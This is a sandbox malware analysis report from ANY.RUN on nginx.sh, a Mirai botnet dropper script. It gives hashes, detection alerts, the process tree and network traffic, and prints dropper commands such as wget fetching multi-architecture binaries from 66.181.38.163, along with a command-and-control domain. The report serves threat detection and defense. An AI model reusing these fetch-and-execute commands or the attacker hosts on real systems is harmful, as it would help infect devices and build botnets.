File name:

nginx.sh

Full analysis: https://app.any.run/tasks/a30fa9e1-4161-4b43-b682-ce3dd573f095
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: August 22, 2024, 04:22:46
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
opendir
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

484118C92B6491EE277ECE81F7556FDF

SHA1:

4AD9E314603A7633CB059647101B2196DFEC9D1D

SHA256:

6BB006FDF25AEED3B4724591B50738767F60426F4DF4C5DCF273D96E3F1714A5

SSDEEP:

12:XaV/ylVdOQaLQ88QylLQ62VQBgdslkZyYlHKSLrIlLTbYilC/XghBIlhT38xNI/7:BfX8zy2kg2el6RJUfL4NITrk6nKrs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 12929)

  • SUSPICIOUS

    • Interacts with the Nginx web server

      • sh (PID: 12921)
      • bash (PID: 12926)
      • sudo (PID: 12922)
      • sudo (PID: 12925)

    • Executes commands using command-line interpreter

      • sudo (PID: 12925)

    • Modifies file or directory owner

      • sudo (PID: 12922)

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 12932)
      • modprobe (PID: 12938)
      • modprobe (PID: 12963)
      • modprobe (PID: 12951)
      • modprobe (PID: 12957)
      • modprobe (PID: 12969)
      • modprobe (PID: 12975)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 12926)

    • Uses wget to download content

      • bash (PID: 12926)

    • Connects to the server without a host name

      • wget (PID: 12929)
      • wget (PID: 12948)
      • wget (PID: 12954)
      • wget (PID: 12960)
      • wget (PID: 12935)
      • wget (PID: 12941)
      • wget (PID: 12972)
      • wget (PID: 12978)
      • wget (PID: 12966)

    • Connects to unusual port

      • nginx.x86 (PID: 12945)

    • Potential Corporate Privacy Violation

      • wget (PID: 12948)
      • wget (PID: 12954)
      • wget (PID: 12929)
      • wget (PID: 12935)
      • wget (PID: 12941)
      • wget (PID: 12972)
      • wget (PID: 12960)
      • wget (PID: 12966)

    • Reads network configuration

      • bash (PID: 12926)

    • Gets active network interfaces

      • bash (PID: 12926)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
274
Monitored processes
61
Malicious processes
4
Suspicious processes
8

Behavior graph

Click at the process to see the details
sh no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs pkill no specs #MIRAI wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs nginx.x86 no specs rm no specs nginx.x86 no specs nginx.x86 pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs modprobe no specs rm no specs pkill no specs wget chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
12921/bin/sh -c "sudo chown user /tmp/nginx\.sh && chmod +x /tmp/nginx\.sh && DISPLAY=:0 sudo -iu user /tmp/nginx\.sh "/bin/shany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
12922sudo chown user /tmp/nginx.sh/usr/bin/sudosh
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
12923chown user /tmp/nginx.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
12924chmod +x /tmp/nginx.sh/usr/bin/chmodsh
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
12925sudo -iu user /tmp/nginx.sh/usr/bin/sudosh
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
12926-bash --login -c \/tmp\/nginx\.sh/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
482
12927/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
12928pkill - 9 nginx.mips/usr/bin/pkillbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
12929wget http://66.181.38.163/nginx.mips/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
12926
12930chmod +x nginx.mips/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
482
Executable files
0
Suspicious files
8
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
12929wget/tmp/nginx.mips (deleted)o
MD5:
SHA256:
12935wget/tmp/nginx.mpsl (deleted)binary
MD5:
SHA256:
12941wget/tmp/nginx.x86 (deleted)o
MD5:
SHA256:
12948wget/tmp/nginx.ppcbinary
MD5:
SHA256:
12954wget/tmp/nginx.sparcbinary
MD5:
SHA256:
12960wget/tmp/nginx.arm4binary
MD5:
SHA256:
12966wget/tmp/nginx.arm5 (deleted)binary
MD5:
SHA256:
12972wget/tmp/nginx.arm6 (deleted)binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
18
DNS requests
11
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
12929
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.mips
unknown
malicious
12935
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.mpsl
unknown
malicious
12941
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.x86
unknown
malicious
12948
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.ppc
unknown
malicious
12954
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.sparc
unknown
malicious
12960
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.arm4
unknown
malicious
12966
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.arm5
unknown
malicious
12972
wget
GET
200
66.181.38.163:80
http://66.181.38.163/nginx.arm6
unknown
malicious
12978
wget
GET
404
66.181.38.163:80
http://66.181.38.163/nginx.arm7
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
470
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
unknown
12929
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12935
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12941
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12945
nginx.x86
188.114.97.3:53378
bot.4567979.site
CLOUDFLARENET
NL
unknown
12948
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12954
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12960
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown
12966
wget
66.181.38.163:80
UNREAL-SERVERS
US
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.96
  • 91.189.91.97
  • 185.125.190.18
  • 185.125.190.98
  • 91.189.91.49
  • 185.125.190.49
  • 185.125.190.48
  • 91.189.91.96
  • 91.189.91.98
  • 185.125.190.17
  • 91.189.91.48
  • 185.125.190.97
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::96
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::97
whitelisted
google.com
  • 142.250.185.142
  • 2a00:1450:4001:827::200e
whitelisted
bot.4567979.site
  • 188.114.97.3
  • 188.114.96.3
unknown
26.100.168.192.in-addr.arpa
unknown
api.snapcraft.io
  • 185.125.188.55
  • 185.125.188.58
  • 185.125.188.59
  • 185.125.188.54
whitelisted

Threats

PID
Process
Class
Message
12929
wget
A Network Trojan was detected
AV INFO Possible Mirai .mips Executable Download
12929
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
12929
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
12935
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
12941
wget
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
12941
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
12941
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
12948
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .ppc File
12948
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
12954
wget
Potentially Bad Traffic
ET INFO SPARC File Download Request from IP Address
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
nginx.sh